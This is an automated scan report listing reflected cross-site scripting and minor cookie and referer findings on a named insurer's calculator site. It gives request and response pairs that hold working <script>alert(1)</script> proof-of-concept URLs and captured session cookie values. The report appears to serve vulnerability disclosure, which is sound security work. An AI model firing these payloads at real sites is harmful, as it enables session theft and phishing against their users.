XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, calculators.northwesternmutual.com

Report generated by XSS.Cx at Mon Jan 23 13:35:32 CST 2012.



1. Cross-site scripting (reflected)

1.1. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs [REST URL parameter 2]

1.2. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs [REST URL parameter 2]

1.3. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs [REST URL parameter 3]

1.4. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs [REST URL parameter 3]

1.5. http://calculators.northwesternmutual.com/tools/northwesternmutual/lifeins01/tool.fcs [REST URL parameter 2]

1.6. http://calculators.northwesternmutual.com/tools/northwesternmutual/lifeins01/tool.fcs [REST URL parameter 3]

1.7. http://calculators.northwesternmutual.com/tools/northwesternmutual/savings03/tool.fcs [REST URL parameter 2]

1.8. http://calculators.northwesternmutual.com/tools/northwesternmutual/savings03/tool.fcs [REST URL parameter 3]

1.9. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs [REST URL parameter 2]

1.10. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs [REST URL parameter 2]

1.11. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs [REST URL parameter 3]

1.12. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs [REST URL parameter 3]

1.13. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs [REST URL parameter 4]

2. Cookie without HttpOnly flag set

2.1. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs

2.2. http://calculators.northwesternmutual.com/tools/northwesternmutual/lifeins01/tool.fcs

2.3. http://calculators.northwesternmutual.com/tools/northwesternmutual/savings03/tool.fcs

2.4. http://calculators.northwesternmutual.com/tools/northwesternmutual/tools/view.fcs

2.5. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs

3. Cross-domain Referer leakage

3.1. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs

3.2. http://calculators.northwesternmutual.com/tools/northwesternmutual/lifeins01/tool.fcs

3.3. http://calculators.northwesternmutual.com/tools/northwesternmutual/savings03/tool.fcs

3.4. http://calculators.northwesternmutual.com/tools/northwesternmutual/tools/view.fcs

4. Cross-domain script include

4.1. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs

4.2. http://calculators.northwesternmutual.com/tools/northwesternmutual/lifeins01/tool.fcs

4.3. http://calculators.northwesternmutual.com/tools/northwesternmutual/savings03/tool.fcs

5. Email addresses disclosed

5.1. http://calculators.northwesternmutual.com/tools/include/scriptaculous/controls.js

5.2. http://calculators.northwesternmutual.com/tools/include/scriptaculous/dragdrop.js

5.3. http://calculators.northwesternmutual.com/tools/northwesternmutual/tools/view.fcs



1. Cross-site scripting (reflected)  next
There are 13 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/budget04/tool.fcs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38444<script>alert(1)</script>840a079bbd0a4657d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tools/northwesternmutual38444<script>alert(1)</script>840a079bbd0a4657d/budget04/tool.fcs?submittingPage=initial&pageToShow=&xxx=3000&Principal=3%2C000&xxx=10.00&LoanRate=10.00&xxx=12&TermBudget=12&xxx=150&MonthlyPayment=150&xxx=1&SavRate=1.00&xxx=33.80&TotalTaxRate=33.80&results.x=101&results.y=9 HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs
Cookie: s_cc=true; s_nr=1325539364238; s_sq=%5B%5BB%5D%5D; s_sv_sid=333555204299; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; ev1=life%20insurace%20annuity; h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeQ@@; JSESSIONID=adb70kKK4Gh9649OwtGst

Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 21:25:01 GMT
Server: Apache
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Content-Type: text/html; charset=UTF-8
Content-Length: 1539


<!--This comment needs to be here for the page to render-->



...[SNIP]...
<BR/>
Unknown URL request format:/northwesternmutual38444<script>alert(1)</script>840a079bbd0a4657d/budget04/tool
</span>
...[SNIP]...

1.2. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/budget04/tool.fcs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65909<script>alert(1)</script>da33b5a76b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/northwesternmutual65909<script>alert(1)</script>da33b5a76b0/budget04/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.northwesternmutual.com/financial-guidance/personal/starting-out/getting-married.aspx
Cookie: s_cc=true; s_nr=1325539348998; s_sq=%5B%5BB%5D%5D; s_sv_sid=333555204299; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; ev1=life%20insurace%20annuity
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 21:23:05 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=acdF66jj9QRGk_JhEtGst; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 1533


<!--This comment needs to be here for the page to render-->



...[SNIP]...
<BR/>
Unknown URL request format:/northwesternmutual65909<script>alert(1)</script>da33b5a76b0/budget04/tool
</span>
...[SNIP]...

1.3. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/budget04/tool.fcs

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7a191<script>alert(1)</script>2ff5759589c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/northwesternmutual/budget047a191<script>alert(1)</script>2ff5759589c/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.northwesternmutual.com/financial-guidance/personal/starting-out/getting-married.aspx
Cookie: s_cc=true; s_nr=1325539348998; s_sq=%5B%5BB%5D%5D; s_sv_sid=333555204299; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; ev1=life%20insurace%20annuity
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 21:23:07 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=dcb3sk6WaAJir5KBEtGst; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 1533


<!--This comment needs to be here for the page to render-->



...[SNIP]...
<BR/>
Unknown URL request format:/northwesternmutual/budget047a191<script>alert(1)</script>2ff5759589c/tool
</span>
...[SNIP]...

1.4. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/budget04/tool.fcs

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e8f9c<script>alert(1)</script>4953971d3a1c6f763 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tools/northwesternmutual/budget04e8f9c<script>alert(1)</script>4953971d3a1c6f763/tool.fcs?submittingPage=initial&pageToShow=&xxx=3000&Principal=3%2C000&xxx=10.00&LoanRate=10.00&xxx=12&TermBudget=12&xxx=150&MonthlyPayment=150&xxx=1&SavRate=1.00&xxx=33.80&TotalTaxRate=33.80&results.x=101&results.y=9 HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs
Cookie: s_cc=true; s_nr=1325539364238; s_sq=%5B%5BB%5D%5D; s_sv_sid=333555204299; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; ev1=life%20insurace%20annuity; h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeQ@@; JSESSIONID=adb70kKK4Gh9649OwtGst

Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 21:25:03 GMT
Server: Apache
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Content-Type: text/html; charset=UTF-8
Content-Length: 1539


<!--This comment needs to be here for the page to render-->



...[SNIP]...
<BR/>
Unknown URL request format:/northwesternmutual/budget04e8f9c<script>alert(1)</script>4953971d3a1c6f763/tool
</span>
...[SNIP]...

1.5. http://calculators.northwesternmutual.com/tools/northwesternmutual/lifeins01/tool.fcs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/lifeins01/tool.fcs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35e22<script>alert(1)</script>61906a3153b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/northwesternmutual35e22<script>alert(1)</script>61906a3153b/lifeins01/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:48 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=cabEcWOGBBWikf4i7wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1534


<!--This comment needs to be here for the page to render-->



...[SNIP]...
<BR/>
Unknown URL request format:/northwesternmutual35e22<script>alert(1)</script>61906a3153b/lifeins01/tool
</span>
...[SNIP]...

1.6. http://calculators.northwesternmutual.com/tools/northwesternmutual/lifeins01/tool.fcs [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/lifeins01/tool.fcs

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1396<script>alert(1)</script>3fc6e3d6662 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/northwesternmutual/lifeins01a1396<script>alert(1)</script>3fc6e3d6662/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:49 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=cabyvwuFjJEJU40y7wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1534


<!--This comment needs to be here for the page to render-->



...[SNIP]...
<BR/>
Unknown URL request format:/northwesternmutual/lifeins01a1396<script>alert(1)</script>3fc6e3d6662/tool
</span>
...[SNIP]...

1.7. http://calculators.northwesternmutual.com/tools/northwesternmutual/savings03/tool.fcs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/savings03/tool.fcs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f1e2f<script>alert(1)</script>6cabfa1be4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/northwesternmutualf1e2f<script>alert(1)</script>6cabfa1be4b/savings03/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:42 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=adbarF47fDB506uR5wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1534


<!--This comment needs to be here for the page to render-->



...[SNIP]...
<BR/>
Unknown URL request format:/northwesternmutualf1e2f<script>alert(1)</script>6cabfa1be4b/savings03/tool
</span>
...[SNIP]...

1.8. http://calculators.northwesternmutual.com/tools/northwesternmutual/savings03/tool.fcs [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/savings03/tool.fcs

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2e15a<script>alert(1)</script>8f9ea4865be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/northwesternmutual/savings032e15a<script>alert(1)</script>8f9ea4865be/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:43 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=dcby6P2e3LTNN-_Y5wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1534


<!--This comment needs to be here for the page to render-->



...[SNIP]...
<BR/>
Unknown URL request format:/northwesternmutual/savings032e15a<script>alert(1)</script>8f9ea4865be/tool
</span>
...[SNIP]...

1.9. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 33bfc(a)03b82e6553d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C33bfc(a)03b82e6553d/script%3E840a079bbd0a4657d/budget04/tool.fcs?submittingPage=initial&pageToShow=&xxx=3000&Principal=3%2C000&xxx=10.00&LoanRate=10.00&xxx=12&TermBudget=12&xxx=150&MonthlyPayment=150&xxx=1&SavRate=1.00&xxx=33.80&TotalTaxRate=33.80&results.x=101&results.y=9 HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: s_nr=1325539923942; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeQ@@
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 22:41:27 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=bcdoSHAHNxlxj-k1zLGst; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 1558


<!--This comment needs to be here for the page to render-->



...[SNIP]...
<33bfc(a)03b82e6553d/script>
...[SNIP]...

1.10. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f1f1c<script>alert(1)</script>b5cd155acd9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/f1f1c<script>alert(1)</script>b5cd155acd9/script%3E840a079bbd0a4657d/budget04/tool.fcs?submittingPage=initial&pageToShow=&xxx=3000&Principal=3%2C000&xxx=10.00&LoanRate=10.00&xxx=12&TermBudget=12&xxx=150&MonthlyPayment=150&xxx=1&SavRate=1.00&xxx=33.80&TotalTaxRate=33.80&results.x=101&results.y=9 HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: s_nr=1325539923942; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeQ@@
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 22:41:30 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=bdc1-f7cIJRVqb_KALGst; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 1540


<!--This comment needs to be here for the page to render-->



...[SNIP]...
<BR/>
Unknown URL request format:/f1f1c<script>alert(1)</script>b5cd155acd9/script>
...[SNIP]...

1.11. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3acb6(a)d01dbdf5704 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/3acb6(a)d01dbdf5704/budget04/tool.fcs?submittingPage=initial&pageToShow=&xxx=3000&Principal=3%2C000&xxx=10.00&LoanRate=10.00&xxx=12&TermBudget=12&xxx=150&MonthlyPayment=150&xxx=1&SavRate=1.00&xxx=33.80&TotalTaxRate=33.80&results.x=101&results.y=9 HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: s_nr=1325539923942; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeQ@@
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 22:41:30 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=dbcIHREe55M-R4hSALGst; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 1534


<!--This comment needs to be here for the page to render-->



...[SNIP]...
</3acb6(a)d01dbdf5704/budget04/tool
</span>
...[SNIP]...

1.12. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6de1b<script>alert(1)</script>003a5e9684d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d6de1b<script>alert(1)</script>003a5e9684d/budget04/tool.fcs?submittingPage=initial&pageToShow=&xxx=3000&Principal=3%2C000&xxx=10.00&LoanRate=10.00&xxx=12&TermBudget=12&xxx=150&MonthlyPayment=150&xxx=1&SavRate=1.00&xxx=33.80&TotalTaxRate=33.80&results.x=101&results.y=9 HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: s_nr=1325539923942; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeQ@@
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 22:41:33 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=dacN_7PS2bTaae9tBLGst; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 1580


<!--This comment needs to be here for the page to render-->



...[SNIP]...
</script>840a079bbd0a4657d6de1b<script>alert(1)</script>003a5e9684d/budget04/tool
</span>
...[SNIP]...

1.13. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dac1c<script>alert(1)</script>d58155a7500 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

